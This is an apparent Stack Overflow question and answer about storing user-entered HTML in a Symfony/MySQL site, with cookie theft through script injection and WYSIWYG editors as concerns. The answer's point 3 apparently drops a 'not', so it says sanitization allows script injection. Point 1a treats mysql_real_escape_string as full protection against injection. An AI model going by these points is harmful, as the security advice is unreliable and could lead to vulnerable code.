php - How should be kept as HTML tags in database?

Question

i create my new site. Now i learn and use Symfony. I have few questions.

1. Why default Symfony allow add HTML tags to database? For example i create new module, i go to module/new, in title i enter <strong>test</strong> and next save it. In database MySQL i have <strong>test</strong>. Is it safe?
2. I know - if i use simply $test->getTitle() then this render text <strong>test</strong>, but what if i would like add for user comments WYSYWIG and use RawValue()? Users can not close tags </strong> and all site is broken...
3. They can for example steal cookies?
4. Is any safe WYSIWYG editor for Symfony? If i use CKEditor or TinyMCE i am safety?
5. On stackoverflow is WMD markdown, but anywhere can't find it. How he kept html tags in database? **test** ?

Answer 1

1a) Safe for what? As long as your database operations sanitize all user input via mysql_real_escape_string() before insertion into queries, then there's no way a malicious user could attack your database via injection attacks. HTML in the database is like anything other piece of text in the database - it's just text with some extra "weird" characters.

1b) As for why it allows it, did you explicitly tell it to NOT allow html? PHP/Symphony/MySQL do exactly as you tell them to.

2) Ensuring that the HTML is valid is up to you. You can use things like HTML Purifier to fix "broken" html.

3) If you're doing HTML sanitization/filtration, then a user can embed <script> blocks into the html they're adding and steal cookies via that method...

4) Those editors are just editors. They display stuff and let you (or others) edit that displayed material. They're as safe or unsafe as you want them to be. They're just tools. If you provide a loaded gun to someone, then don't be surprised if someone gets shot.

5) Just because some text has tags in it, of any sort, doesn't make that text magically "different" from other text. MySQL doesn't care, need to know, or even HAVE to know that you're inserting markdown'd text into a field. It just stores what you tell it to, and pulls it back out when you want it too.